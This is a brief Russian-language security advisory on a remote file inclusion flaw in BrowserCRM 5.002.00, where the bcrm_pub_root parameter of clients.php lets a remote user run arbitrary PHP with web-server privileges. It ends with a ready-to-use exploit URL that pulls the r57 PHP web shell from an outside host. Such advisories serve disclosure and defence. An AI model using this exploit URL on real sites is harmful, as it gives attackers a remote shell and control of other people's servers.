Программа: BrowserCRM 5.002.00

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «bcrm_pub_root» сценарием clients.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

www.site.com/browser_crm/pub/clients.php?bcrm_pub_root =http://www.gwebspace.de/mohsen/shell/r57.txt?



Оставить мнение